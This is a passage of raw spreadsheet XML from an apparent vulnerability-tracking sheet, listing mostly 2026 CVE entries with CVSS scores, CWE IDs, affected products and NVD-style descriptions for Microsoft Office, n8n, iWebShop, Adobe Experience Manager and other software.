locally.</t></is></c><c r="T1327" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83949</t></is></c></row><row r="1328"><c r="A1328" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1328" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1328" s="5" t="inlineStr"><is><t>CVE-2026-83951</t></is></c><c r="D1328" s="5" t="n"><v>5.5</v></c><c r="E1328" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1328" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1328" s="5" t="inlineStr" /><c r="H1328" s="5" t="n"><v>0.004</v></c><c r="I1328" s="5" t="inlineStr" /><c r="J1328" s="5" t="inlineStr" /><c r="K1328" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1328" s="5" t="inlineStr" /><c r="M1328" s="5" t="inlineStr" /><c r="N1328" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1328" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1328" s="5" t="inlineStr" /><c r="R1328" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1328" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Word allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1328" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83951</t></is></c></row><row r="1329"><c r="A1329" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1329" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1329" s="5" t="inlineStr"><is><t>CVE-2026-83991</t></is></c><c r="D1329" s="5" t="n"><v>5.5</v></c><c r="E1329" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1329" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1329" s="5" t="inlineStr" /><c r="H1329" s="5" t="n"><v>0.003</v></c><c r="I1329" s="5" t="inlineStr" /><c r="J1329" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1329"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329" s="5" t="inlineStr" /><c r="M1329" s="5" t="inlineStr" /><c r="N1329" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1329" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1329" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1329" s="5" t="inlineStr" /><c r="R1329" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1329" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Cloud Files Mini Filter Driver allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1329" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83991</t></is></c></row><row r="1330"><c r="A1330" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1330" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1330" s="5" t="inlineStr"><is><t>CVE-2026-85875</t></is></c><c r="D1330" s="5" t="n"><v>5.5</v></c><c r="E1330" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1330" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1330" s="5" t="inlineStr" /><c r="H1330" s="5" t="n"><v>0.004</v></c><c r="I1330" s="5" t="inlineStr" /><c r="J1330" s="5" t="inlineStr" /><c r="K1330" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1330" s="5" t="inlineStr" /><c r="M1330" s="5" t="inlineStr" /><c r="N1330" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1330" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1330" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1330" s="5" t="inlineStr" /><c r="R1330" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1330" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1330" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85875</t></is></c></row><row r="1331"><c r="A1331" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1331" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1331" s="5" t="inlineStr"><is><t>CVE-2026-86084</t></is></c><c r="D1331" s="5" t="n"><v>5.5</v></c><c r="E1331" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1331" s="5" t="inlineStr" /><c r="H1331" s="5" t="n"><v>0.003</v></c><c r="I1331" s="5" t="inlineStr" /><c r="J1331" s="5" t="inlineStr" /><c r="K1331" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1331" s="5" t="inlineStr" /><c r="M1331" s="5" t="inlineStr" /><c r="N1331" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1331" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1331" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1331" s="5" t="inlineStr" /><c r="R1331" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S1331" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the public OIDC login and callback endpoints completed authentication even when OIDC was not the enabled active authentication method. An Enterprise administrator who had configured and later disabled an identity provider still exposed a working route that could issue valid sessions. The affected logic is packages/cli/src/modules/sso-oidc/oidc.service.ee.ts, including generateLoginUrl and the callback flow that lacked assertOidcLoginEnabled. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1331" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86084</t></is></c></row><row r="1332"><c r="A1332" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1332" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1332" s="5" t="inlineStr"><is><t>CVE-2026-86511</t></is></c><c r="D1332" s="5" t="n"><v>5.5</v></c><c r="E1332" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1332" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1332" s="5" t="inlineStr" /><c r="H1332" s="5" t="n"><v>0.004</v></c><c r="I1332" s="5" t="inlineStr" /><c r="J1332" s="5" t="inlineStr" /><c r="K1332" s="5" t="inlineStr" /><c r="L1332" s="5" t="inlineStr" /><c r="M1332" s="5" t="inlineStr" /><c r="N1332" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1332" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1332" s="5" t="inlineStr" /><c r="R1332" s="5" t="inlineStr"><is><t>CWE-400, CWE-404</t></is></c><c r="S1332" s="5" t="inlineStr"><is><t>A vulnerability was found in java-json-tools jackson-coreutils 2.0. Affected by this vulnerability is the function BigDecimal.toPlainString of the file src/main/java/com/github/fge/jackson/JacksonUtils.java. Performing a manipulation results in resource consumption. The attack may be initiated remotely. The exploit has been made public and could be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1332" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86511</t></is></c></row><row r="1333"><c r="A1333" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1333" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1333" s="5" t="inlineStr"><is><t>CVE-2026-86513</t></is></c><c r="D1333" s="5" t="n"><v>5.5</v></c><c r="E1333" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1333" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1333" s="5" t="inlineStr" /><c r="H1333" s="5" t="n"><v>0.004</v></c><c r="I1333" s="5" t="inlineStr" /><c r="J1333" s="5" t="inlineStr" /><c r="K1333" s="5" t="inlineStr" /><c r="L1333" s="5" t="inlineStr" /><c r="M1333" s="5" t="inlineStr" /><c r="N1333" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1333" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1333" s="5" t="inlineStr" /><c r="R1333" s="5" t="inlineStr"><is><t>CWE-400, CWE-770</t></is></c><c r="S1333" s="5" t="inlineStr"><is><t>A security flaw has been discovered in java-json-tools jackson-coreutils 2.0. This vulnerability affects the function TreePointer.tokensFromInput of the file src/main/java/com/github/fge/jackson/jsonpointer/TreePointer.java of the component JSON Pointer parser. The manipulation results in allocation of resources. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1333" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86513</t></is></c></row><row r="1334"><c r="A1334" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1334" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1334" s="5" t="inlineStr"><is><t>CVE-2026-86519</t></is></c><c r="D1334" s="5" t="n"><v>5.5</v></c><c r="E1334" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1334" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1334" s="5" t="inlineStr" /><c r="H1334" s="5" t="n"><v>0.003</v></c><c r="I1334" s="5" t="inlineStr" /><c r="J1334" s="5" t="inlineStr" /><c r="K1334" s="5" t="inlineStr" /><c r="L1334" s="5" t="inlineStr" /><c r="M1334" s="5" t="inlineStr" /><c r="N1334" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1334" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1334" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1334" s="5" t="inlineStr" /><c r="R1334" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1334" s="5" t="inlineStr"><is><t>A vulnerability was found in code-projects Student Crud Operation 1.0. This impacts an unknown function of the file /card_activation.sql of the component Backup File Handler. The manipulation results in information disclosure. The attack can be launched remotely. The exploit has been made public and could be used.</t></is></c><c r="T1334" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86519</t></is></c></row><row r="1335"><c r="A1335" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1335" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1335" s="5" t="inlineStr"><is><t>CVE-2026-86665</t></is></c><c r="D1335" s="5" t="n"><v>5.5</v></c><c r="E1335" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1335" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1335" s="5" t="inlineStr" /><c r="H1335" s="5" t="n"><v>0.004</v></c><c r="I1335" s="5" t="inlineStr" /><c r="J1335" s="5" t="inlineStr" /><c r="K1335" s="5" t="inlineStr" /><c r="L1335" s="5" t="inlineStr" /><c r="M1335" s="5" t="inlineStr" /><c r="N1335" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1335" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1335" s="5" t="inlineStr" /><c r="R1335" s="5" t="inlineStr"><is><t>CWE-862, CWE-863</t></is></c><c r="S1335" s="5" t="inlineStr"><is><t>A vulnerability was identified in aircheng-org iWebShop-5 up to 5.15. This issue affects the function Update::index of the file controllers/update.php. The manipulation leads to missing authorization. Remote exploitation of the attack is possible. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1335" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86665</t></is></c></row><row r="1336"><c r="A1336" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1336" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1336" s="5" t="inlineStr"><is><t>CVE-2026-86666</t></is></c><c r="D1336" s="5" t="n"><v>5.5</v></c><c r="E1336" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1336" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1336" s="5" t="inlineStr" /><c r="H1336" s="5" t="n"><v>0.005</v></c><c r="I1336" s="5" t="inlineStr" /><c r="J1336" s="5" t="inlineStr" /><c r="K1336" s="5" t="inlineStr" /><c r="L1336" s="5" t="inlineStr" /><c r="M1336" s="5" t="inlineStr" /><c r="N1336" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1336" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1336" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1336" s="5" t="inlineStr" /><c r="R1336" s="5" t="inlineStr"><is><t>CWE-284, CWE-434</t></is></c><c r="S1336" s="5" t="inlineStr"><is><t>A security flaw has been discovered in aircheng-org iWebShop-5 up to 5.15. Impacted is the function upload_json/uploadFile of the file controllers/pic.php. The manipulation results in unrestricted upload. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1336" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86666</t></is></c></row><row r="1337"><c r="A1337" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1337" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1337" s="5" t="inlineStr"><is><t>CVE-2026-86669</t></is></c><c r="D1337" s="5" t="n"><v>5.5</v></c><c r="E1337" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1337" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1337" s="5" t="inlineStr" /><c r="H1337" s="5" t="n"><v>0.004</v></c><c r="I1337" s="5" t="inlineStr" /><c r="J1337" s="5" t="inlineStr" /><c r="K1337" s="5" t="inlineStr" /><c r="L1337" s="5" t="inlineStr" /><c r="M1337" s="5" t="inlineStr" /><c r="N1337" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1337" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1337" s="5" t="inlineStr" /><c r="R1337" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S1337" s="5" t="inlineStr"><is><t>A vulnerability was detected in aircheng-org iWebShop-5 up to 5.15. This affects the function Login of the file controllers/systemseller.php. Performing a manipulation of the argument Name results in improper authentication. It is possible to initiate the attack remotely. The exploit is now public and may be used. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1337" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86669</t></is></c></row><row r="1338"><c r="A1338" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1338" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1338" s="5" t="inlineStr"><is><t>CVE-2026-86672</t></is></c><c r="D1338" s="5" t="n"><v>5.5</v></c><c r="E1338" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1338" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1338" s="5" t="inlineStr" /><c r="H1338" s="5" t="n"><v>0.003</v></c><c r="I1338" s="5" t="inlineStr" /><c r="J1338" s="5" t="inlineStr" /><c r="K1338" s="5" t="inlineStr" /><c r="L1338" s="5" t="inlineStr" /><c r="M1338" s="5" t="inlineStr" /><c r="N1338" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1338" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1338" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1338" s="5" t="inlineStr" /><c r="R1338" s="5" t="inlineStr"><is><t>CWE-200, CWE-284</t></is></c><c r="S1338" s="5" t="inlineStr"><is><t>A vulnerability has been found in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected is an unknown function of the file example.7z of the component Backup Handler. The manipulation leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Continious delivery with rolling releases is used by this product. Therefore, no version details of affected nor updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1338" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86672</t></is></c></row><row r="1339"><c r="A1339" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1339" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1339" s="5" t="inlineStr"><is><t>CVE-2026-86673</t></is></c><c r="D1339" s="5" t="n"><v>5.5</v></c><c r="E1339" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1339" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1339" s="5" t="inlineStr" /><c r="H1339" s="5" t="n"><v>0.003</v></c><c r="I1339" s="5" t="inlineStr" /><c r="J1339" s="5" t="inlineStr"><is><t>mysql</t></is></c><c r="K1339" s="5" t="inlineStr" /><c r="L1339" s="5" t="inlineStr" /><c r="M1339" s="5" t="inlineStr" /><c r="N1339" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1339" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1339" s="5" t="inlineStr" /><c r="R1339" s="5" t="inlineStr"><is><t>CWE-259, CWE-798</t></is></c><c r="S1339" s="5" t="inlineStr"><is><t>A vulnerability was determined in ningzichun Student Management System up to 98760f5711cf6dc8b4adca53a9e207ca49b02ebf. Affected by this issue is the function mysqli_connect of the file config/database.php of the component Database Connection. This manipulation causes hard-coded credentials. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1339" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86673</t></is></c></row><row r="1340"><c r="A1340" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1340" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1340" s="5" t="inlineStr"><is><t>CVE-2026-86716</t></is></c><c r="D1340" s="5" t="n"><v>5.5</v></c><c r="E1340" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1340" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1340" s="5" t="inlineStr" /><c r="H1340" s="5" t="n"><v>0.003</v></c><c r="I1340" s="5" t="inlineStr" /><c r="J1340" s="5" t="inlineStr" /><c r="K1340" s="5" t="inlineStr" /><c r="L1340" s="5" t="inlineStr" /><c r="M1340" s="5" t="inlineStr" /><c r="N1340" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1340" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1340" s="5" t="inlineStr" /><c r="R1340" s="5" t="inlineStr"><is><t>CWE-119, CWE-122</t></is></c><c r="S1340" s="5" t="inlineStr"><is><t>A vulnerability was determined in Cesanta mJS up to 1.26. Affected is the function skip_spaces_and_comments of the file src/mjs_tok.c. Executing a manipulation can lead to heap-based buffer overflow. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.</t></is></c><c r="T1340" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86716</t></is></c></row><row r="1341"><c r="A1341" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1341" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1341" s="5" t="inlineStr"><is><t>CVE-2026-86808</t></is></c><c r="D1341" s="5" t="n"><v>5.5</v></c><c r="E1341" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1341" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1341" s="5" t="inlineStr" /><c r="H1341" s="5" t="n"><v>0.006</v></c><c r="I1341" s="5" t="inlineStr" /><c r="J1341" s="5" t="inlineStr" /><c r="K1341" s="5" t="inlineStr" /><c r="L1341" s="5" t="inlineStr" /><c r="M1341" s="5" t="inlineStr" /><c r="N1341" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1341" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1341" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1341" s="5" t="inlineStr" /><c r="R1341" s="5" t="inlineStr"><is><t>CWE-287, CWE-306</t></is></c><c r="S1341" s="5" t="inlineStr"><is><t>A security vulnerability has been detected in moltis-org moltis up to 20260818.10. The affected element is the function vault_unlock_handler/vault_recovery_handler of the file vault.rs. Such manipulation leads to missing authentication. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 20260819.01 is sufficient to fix this issue. The name of the patch is 3b92dd64d5648f829968cf48bf67dc3113852fef. Upgrading the affected component is advised.</t></is></c><c r="T1341" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86808</t></is></c></row><row r="1342"><c r="A1342" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1342" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1342" s="5" t="inlineStr"><is><t>CVE-2025-64542</t></is></c><c r="D1342" s="5" t="n"><v>5.4</v></c><c r="E1342" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1342" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1342" s="5" t="inlineStr" /><c r="H1342" s="5" t="n"><v>0.003</v></c><c r="I1342" s="5" t="inlineStr" /><c r="J1342" s="5" t="inlineStr" /><c r="K1342" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1342" s="5" t="inlineStr" /><c r="M1342" s="5" t="inlineStr" /><c r="N1342" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1342" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1342" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1342" s="5" t="inlineStr" /><c r="R1342" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64542</t></is></c></row><row r="1343"><c r="A1343" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1343" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1343" s="5" t="inlineStr"><is><t>CVE-2025-64584</t></is></c><c r="D1343" s="5" t="n"><v>5.4</v></c><c r="E1343" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1343" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1343" s="5" t="inlineStr" /><c r="H1343" s="5" t="n"><v>0.003</v></c><c r="I1343" s="5" t="inlineStr" /><c r="J1343" s="5" t="inlineStr" /><c r="K1343" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1343" s="5" t="inlineStr" /><c r="M1343" s="5" t="inlineStr" /><c r="N1343" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1343" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1343" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1343" s="5" t="inlineStr" /><c r="R1343" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1343"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64584</t></is></c></row><row r="1344"><c r="A1344" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1344" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1344" s="5" t="inlineStr"><is><t>CVE-2025-64588</t></is></c><c r="D1344" s="5" t="n"><v>5.4</v></c><c r="E1344" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1344" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1344" s="5" t="inlineStr" /><c r="H1344" s="5" t="n"><v>0.003</v></c><c r="I1344" s="5" t="inlineStr" /><c r="J1344" s="5" t="inlineStr" /><c r="K1344" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1344" s="5" t="inlineStr" /><c r="M1344" s="5" t="inlineStr" /><c r="N1344" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1344" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1344" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1344" s="5" t="inlineStr" /><c r="R1344" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1344"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64588</t></is></c></row><row r="1345"><c r="A1345" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1345" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1345" s="5" t="inlineStr"><is><t>CVE-2025-64589</t></is></c><c r="D1345" s="5" t="n"><v>5.4</v></c><c r="E1345" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1345" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1345" s="5" t="inlineStr" /><c r="H1345" s="5" t="n"><v>0.003</v></c><c r="I1345" s="5" t="inlineStr" /><c r="J1345" s="5" t="inlineStr" /><c r="K1345" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1345" s="5" t="inlineStr" /><c r="M1345" s="5" t="inlineStr" /><c r="N1345" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1345" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1345" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1345" s="5" t="inlineStr" /><c r="R1345" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1345"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64589</t></is></c></row><row r="1346"><c r="A1346" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1346" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1346" s="5" t="inlineStr"><is><t>CVE-2025-64610</t></is></c><c r="D1346" s="5" t="n"><v>5.4</v></c><c r="E1346" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1346" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1346" s="5" t="inlineStr" /><c r="H1346" s="5" t="n"><v>0.003</v></c><c r="I1346" s="5" t="inlineStr" /><c r="J1346" s="5" t="inlineStr" /><c r="K1346" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1346" s="5" t="inlineStr" /><c r="M1346" s="5" t="inlineStr" /><c r="N1346" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1346" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1346" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1346" s="5" t="inlineStr" /><c r="R1346" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64610</t></is></c></row><row r="1347"><c r="A1347" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1347" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1347" s="5" t="inlineStr"><is><t>CVE-2025-64618</t></is></c><c r="D1347" s="5" t="n"><v>5.4</v></c><c r="E1347" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1347" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1347" s="5" t="inlineStr" /><c r="H1347" s="5" t="n"><v>0.003</v></c><c r="I1347" s="5" t="inlineStr" /><c r="J1347" s="5" t="inlineStr" /><c r="K1347" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1347" s="5" t="inlineStr" /><c r="M1347" s="5" t="inlineStr" /><c r="N1347" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1347" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1347" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1347" s="5" t="inlineStr" /><c r="R1347" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S134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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-64618</t></is></c></row><row r="1348"><c r="A1348" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1348" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1348" s="5" t="inlineStr"><is><t>CVE-2025-64830</t></is></c><c r="D1348" s="5" t="n"><v>5.4</v></c><c r="E1348" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1348" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1348" s="5" t="inlineStr" /><c r="H1348" s="5" t="n"><v>0.003</v></c><c r="I1348" 